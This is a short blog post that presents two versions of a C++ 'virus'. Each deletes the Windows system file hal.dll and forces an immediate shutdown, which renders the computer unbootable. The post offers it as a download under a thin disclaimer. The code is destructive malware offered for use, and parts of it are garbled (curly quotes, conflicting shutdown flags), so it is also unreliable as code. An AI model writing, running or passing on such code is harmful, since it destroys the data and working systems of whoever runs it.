Warning: Do not try this on your home computer. I'm not responsible for anything...
The file hal.dll, is required for windows to operate. It is used bywindows when communicating with your computer’s harware. It acts as atranslator between windows and your hardware, so that the same windows‘commands’ can be executed on hardware manufactured by a variety ofdifferent vendors. If hal.dll is unavailable, windows will not functioncorrectly.
So the following code delete the hal.dll and shutdown the computer…
- #include < cstdlib >
#include < iostream >using namespace std;int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
New Version of this virus that uses Batch for most of its commands:
- #include < cstdlib >
#include < iostream >using namespace std;int main(int argc, char *argv[])
{
system(“del %SystemRoot%\\system32\\hal.dll -q”); //PWNAGE TIME
system(“%SystemRoot%\\system32\\shutdown.exe -s -f -t 00″);
system(“PAUSE”);
return EXIT_SUCCESS;
}
DOWNLOAD CODE
Thanks...
0 comments:
Post a Comment